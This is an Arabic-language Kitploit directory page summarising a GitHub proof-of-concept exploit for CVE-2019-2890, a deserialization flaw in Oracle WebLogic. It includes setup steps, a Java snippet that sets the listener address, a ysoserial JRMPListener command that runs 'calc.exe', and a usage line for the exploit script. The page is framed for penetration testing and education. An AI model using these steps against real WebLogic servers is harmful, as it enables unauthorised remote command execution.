Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2019-2890 — استغلال PoC لـ CVE-2019-2890 يستهدف Oracle WebLogic، باستخدام حمولة ysoserial JRMP لتنفيذ الأوامر عن بُعد عبر إزالة التسلسل للكائنات المسلسلة. | Kitploit
أدوات/GitHubGitHub/l1nk3rlin/cve-2019-2890
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالقيادة والسيطرةأداة الوصول عن بعد
GitHubl1nk3rlin/cve-2019-2890

CVE-2019-2890

استغلال PoC لـ CVE-2019-2890 يستهدف Oracle WebLogic، باستخدام حمولة ysoserial JRMP لتنفيذ الأوامر عن بُعد عبر إزالة التسلسل للكائنات المسلسلة.

عرض المستودع
85224منذ 6 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

إخلاء مسؤولية

للاستخدام التعليمي والتواصل فقط، والمسؤولية عن أي استخدام آخر تقع على المستخدم.

ملاحظات

تم استيراد ملفات jar ذات الصلة إلى المشروع، وتستخدم طريقة الاستغلال JRMP من yso، ويمكن تعديل طريقة الاستغلال أثناء التعلم والتصحيح.

أولاً، يجب وضع ملف SerializedSystemIni.dat الموجود ضمن weblogic في مجلد security.

ثم يجب إعادة تسمية yso إلى ysoserial.jar واستيراده إلى دليل lib.

1

ثانيًا، عنوان IP والمنفذ في getObject داخل ملف weblogic/wsee/jaxws/persistence/PersistentContext.java.

root@kitploit:~
        try {
            var3.writeObject(Poc.getObject("127.0.0.1:8000"));
        } catch (Exception e) {
            e.printStackTrace();
        }

أخيرًا، يتم الاستماع عن بُعد عبر JRMP وتنفيذ الأمر باستخدام 7u21.

root@kitploit:~
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 8000 Jdk7u21 "calc.exe"

طريقة الاستخدام: قم بتشغيل Poc.java لإنشاء ملف التسلسل poc.ser، ثم استخدم الأمر:

root@kitploit:~
python weblogic.py ip port poc.ser

1

1

تنزيل الأداة